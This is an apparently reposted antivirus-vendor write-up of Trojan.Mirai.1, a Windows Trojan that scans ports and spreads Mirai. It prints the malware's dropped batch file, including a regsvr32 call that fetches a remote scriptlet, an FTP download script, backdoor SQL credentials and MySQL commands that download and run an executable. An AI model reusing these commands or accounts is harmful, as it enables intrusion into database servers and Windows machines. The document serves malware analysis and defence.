Saturday, February 11, 2017

Windows Mirai

Trojan.Mirai.1


   Added to Dr.Web virus database:2017-01-30
Virus description was added:2017-02-08

SHA1:

  • 9575d5edb955e8e57d5886e1cf93f54f52912238
  • f97e8145e1e818f17779a8b136370c24da67a6a5
  • 42c9686dade9a7f346efa8fdbe5dbf6fa1a7028e
  • 938715263e1e24f3e3d82d72b4e1d2b60ab187b8
A Trojan for Microsoft Windows written in C++. Designed to scan TCP ports from the indicated range of IP addresses in order to execute various commands and distribute other malware.
When launched, the Trojan connects to its command and control server, downloads the configuration file (wpd.dat) and extracts the list of IP addresses. Then the scanner is launched: it refers to the listed addresses and simultaneously checks several ports. The Trojan can address the following ports:
 * 22
 * 23
 * 135
 * 445
 * 1433
 * 3306
 * 3389

Launch flags:
-syn - use scanning in Tcp_Syn mode instead of Tcp_connect mode
-log - log information in the log file
-see - display console window
-srv - launch as a server
-cli - launch as a client
-start, -stop, -create, -delete - service management
-run – launch the Trojan as an application, not as a service
-s - launch the Trojan a service

In case of successful connection to the remote node via any used protocol except RDP, the Trojan executes a set of commands indicated in the configuration file. While connecting to the Linux device via Telnet protocol, it downloads a binary file, and this file subsequently downloads and launches Linux.Mirai.
For connections with WMI, it launches processes with Win32_Process.Create method in the remote system. Using IPC, it can directly send IPC commands to the remote node.
Upon connection to the remote MS SQL server, it creates file С:\windows\system32\wbem\123.bat with the following content:
@echo off
mode con: cols=13 lines=1
cacls C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll /e /g system:f&cacls C:\\windows\\system32\\cacls.exe /e /g system:f&cacls C:\\windows\\system32\\cmd.exe /e /g system:f&cacls C:\\windows\\system32\\ftp.exe /e /g system:f&cacls C:\\windows\\system32\\rundll32.exe /e /g everyone:f
taskkill /f /im regsvr32.exe&taskkill /f /im rundll32.exe
regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll&regsvr32 /s jscript.dll&regsvr32 /s vbscript.dll&regsvr32 /s scrrun.dll&regsvr32 /s WSHom.Ocx&regsvr32 /s shell32.dll
attrib +s +h *.bat
start regsvr32 /u /s /i:http://*****.com:280/v.sct scrobj.dll
if exist c:\\windows\\debug\\item.dat start rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa
exit
Creates file PerfStringse.ini with the following content:
[Version]
signature=$CHICAGO$
[File Security]
1=c:\\windows\\system32\\cmd.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\ftp.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\cacls.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\regsvr32.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\icacls.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
1=c:\\windows\\system32\\net1.exe, 2, D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)
Creates file c:\windows\systemmyusa.dvr with the following content:
open down.f321y.com
mssql
1433
get 1.dat c:\\windows\\system\\myusago.dvr
get 1.bat c:\\windows\\system\\backs.bat
bye
It also creates DBMS user with login Mssqla and password Bus3456#qwein, grants him sysadmin privileges. Acting under the name of this user and with the help of SQL server event service, various tasks are executed.
Upon connection to the remote MySQL server, it creates a user with the name MySQL and password phpgod, grants him the following privileges:
select
insert
update
delete
create
drop
reload
shutdown
process
file
grant
references
index
alter
show_db
super
create_tmp_table
lock_tables
execute
repl_slave
repl_client
create_view
show_view
create_routine
alter_routine
create_user
event
trigger
create_tablespace

Creates dynamic library in the folder C:\Windows\System32\ and imports its functions. Executes the following MySQL commands:

SELECT downa("http://*****.com:280/mysql.exe","c:\\windows\\system32\\ser.exe");
SELECT cmda("C:\\windows\\system32\\ser.exe");

0 comments:

Post a Comment